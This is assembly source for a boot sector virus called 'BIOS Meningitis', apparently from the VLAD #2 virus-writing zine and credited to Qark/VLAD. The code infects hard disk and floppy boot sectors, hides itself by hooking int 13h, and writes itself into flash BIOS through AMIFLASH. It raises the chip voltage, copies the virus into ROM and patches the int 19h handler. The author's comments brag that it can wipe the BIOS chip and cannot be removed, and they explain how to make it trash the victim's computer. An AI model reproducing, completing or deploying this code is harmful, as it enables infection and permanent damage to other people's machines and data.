; -=[ BIOS Meningitis ]=-
; Basic boot sector virus with a twist.
; The worlds first flash BIOS infecting virus!
; I _just_ fit all this into 512 bytes. Infact there is only four bytes
; spare... there wasn't even enough room for the name! It used to copy
; the partition table to the end of the virus but that is 64 bytes that
; just couldn't spared, so now you if you boot from a floppy disk, the
; hard disk won't be accessible. But it's a full stealth virus apart
; from that.
; If you have flash BIOS on your computer there is a chance it will fuck
; it up! I'm talking wiped BIOS chip type fucked! You WONT be able to
; remove this virus!!!
; The results of any tests of this with flash BIOS would be appreciated.
; Assemble with A86 as always.
;On entry to the boot sector DL=Drive booted from.
mov ss,ax ;Setup the stack
mov ds,ax ;DS,CS,ES,SS=0
;*** 40: - memory in k's - reduce by one or so ***
dec word ptr [413h] ;0:413 = Memory in K, Sub one K.
int 12h ;Get memory into AX
;Since memory is in K we have to
;multiply by 1024. To do that we
;would SHL AX,10. But because we are
;looking for the segment that takes
;4 bits off the equation.
shl ax,cl ;Thus SHL AX,6
mov es,ax ;ES = Virus Segment
;*** read virus sector into TOM (top of memory) ***
rep movsb ;Move virus to ES:0
mov ax,word ptr [13h*4] ;Get int13h from vector table.
mov word ptr es:[offset i13],ax
mov ax,word ptr [13h*4+2]
mov word ptr es:[offset i13+2],ax
mov word ptr [13h*4],offset handler
mov word ptr [13h*4+2],es
mov ax,offset restart
;Load the original bootsector from the end of the root directory and
mov bx,7c00h ;Where it's meant to be.
mov cx,2 ;Read HD boot strap from MBR.
mov ax,201h ;Read one sector from root directory.
;load up floppy
mov cl,14 ;Cylinder=0, Sector=14
mov dh,1 ;Head=1
push dx ;DL=Drive we are at.
cmp byte ptr cs:flash_done,1 ;flash is already infected.
call flash_BIOS ;Infect flash BIOS if any.
db 0eah ;JMPF 0000:7C00H
cmp ah,2 ;Reading the first sector ?
;Test if already infected.
cmp word ptr es:[bx + offset marker],'LV'
je stealth ;Already infected.
cmp dl,80h ;C:
mov cx,2 ;Sector 2 - Empty MBR space.
;Store at end of root directory for floppy drives.
;(Will fuck up on 360k but I dont give a shit!)
mov cx,14 ;Cylinder=0, Sector=14
mov dh,1 ;Head=1
;Write original boot sector to spare room.
;The virus is written at this point.
mov byte ptr cs:flash_done,0
mov ax,301h ;Write virus.
db 0eah ;Stands for Jmpf
i13 dd 0 ;The original int13h
Int13h proc near
call dword ptr cs:[i13]
Marker db 'VLAD' ;Running out of room so small
Flash_BIOS Proc Near
; Flash BIOS infection (c) 1994 Qark/VLAD!
;Disclaimer: If any of this wrecks your computer that's your bad luck
;because you know this is dangerous code.
;I just hope that AMIFLASH is loaded at boot and isn't a driver. Since it's
;written by a BIOS maker you'd think so...
mov ax,0e000h ;Get flash BIOS number.
int 16h ;Test for its presence.
cmp al,0fah ;<-- gotta test this
;We are now working with AMIFLASH!
;First we'll find a nice place to store our virus.
; We'll scan between F000-FFFF where BIOS is normally stored for
; a 1K chunk of consecutive zeros. (We might only need half a K
; but I'm overplanning)
mov ax,0f000h ;ROM BIOS segment
cmp ax,0fff0h ;No room for our virus.
cmp word ptr [si],0 ;Scan words
inc dx ;DX is our free room counter.
cmp dx,512 ;1024 byte buffer found (512x2)
inc si ;Coz we are messing with words.
cmp si,16 ;We are going up in paragraphs.
sub ax,40h ;Sub 1K (40hx16=1024)
mov ds,ax ;Coz we are using segments
mov ax,0e001h ;Chipset save requirement.
;BX=Number of bytes to Save Chipset.
;We won't bother saving the chipset because it takes up more room
;than our virus buffer can store. Fuck em :)
mov byte ptr cs:chipset,1 ;Indicate we haven't saved anything.
mov byte ptr cs:chipset,0 ;We've saved stuff.
pop es ;ES=CS
mov di,offset buffer
int 16h ;Chipset Status to ES:DI
int 16h ;Raise Voltage (this may take time).
mov al,7 ;Flash Write Enable.
;Flash Memory is now writable. I am working on nothing here
;so I'll assume you just write to it normally and it'll be
;put there. If you were into writing destructive payloads
;this would be the mother of them all. Just load CX with 0ffffh
;to trash their computer. Also, leaving the computer in this
;state for extended periods could cause damage (Dunno ? Their
;electricity bill would go up at least :)
pop es ;DS=ES=Place to put virus.
mov cx,512 ;<-- FFFF = trouble!
pop ds ;DS=CS
rep movsb ;Move our virus into BIOS.
;Hopefully our virus is written ?
;Ok, I looked into this carefully. At bootup int19h points
;into the BIOS but thereafter is grabbed by various programs
;(Dunno why, its the shittiest interrupt out). So, if you debug
;right now it'll point into some shadowed area or else into
;segment 70h, but it won't at bootup which is the only time boot
;sector viruses get executed so all is cool.
;What we'll do is modify the actual bytes at the entry point to
;the interrupt. You might think I should do something else but
;I can't think of any other way of hooking an interrupt at bootup.
;Priest-P/S reckoned I should just store my virus in the Flash
;and let the bootvirus just jump to it or something but then
;it's not really infected methinks. He also suggested I just modify
;the int13h entry point and restore the bytes etc. Well as you can
;see from the involved code needed just to write to flash I think
;that with a common interrupt like int13h it isn't feasible.
;Get Segment:Offset of original int19handler
mov bx,es ;BX=Virus Segment
mov ds,ax ;DS=Vector Table.
mov di,word ptr [19h*4] ;Offset of int19h
mov es,word ptr [19h*4+2] ;Segment of 19h
;Write a JMP FAR at the int19h entry point.
mov ax,offset int19handler
stosw ;Creates a JMPF INT19HANDLER at the
;int19h entry point.
mov ax,0e004h ;Lower Voltage.
mov al,6 ;Write Protect.
cmp byte ptr cs:chipset,0
jne No_Flash_BIOS ;We've done for this one.
pop es ;ES=CS
mov di,offset buffer ;Restore all their shit.
chipset db 0 ;1=chipset not saved
flash_done db 0 ;1=loaded from flash.
;This is our own int19h handler. The original sux because it isn't infected.
;(Strange logic :)
Int19Handler Proc Near
mov es,ax ;ES=0
mov ax,0abbah ;ABBA - from Muriels Wedding.
cmp ax,0baabh ;BAAB - I like these.
;We are currently before the boot here. Lets install our virus before
;any boot sectors or anything get loaded.
push cs ;DS=0
rep movsb ;Move our virus from BIOS into boot buffer.
mov dl,80h ;Make it think its C:
jmp goto_Buffer ;Execute it.
int 13h ;Reset disk
int 13h ;Read boot sector.
mov byte ptr es:[7c00h+offset flash_done],1
db 0eah ;JMPF 0000:7C00
mov dl,80h ;Boot from C:
int 13h ;Reset controller.
int 18h ;Called when a boot fucks up
DupSize equ 510 - offset End_Virus
db DupSize dup (0)
db 55h,0aah ;End of Sector Marker.
Buffer: ;512 bytes of storage space in here.
- VLAD #2 INDEX -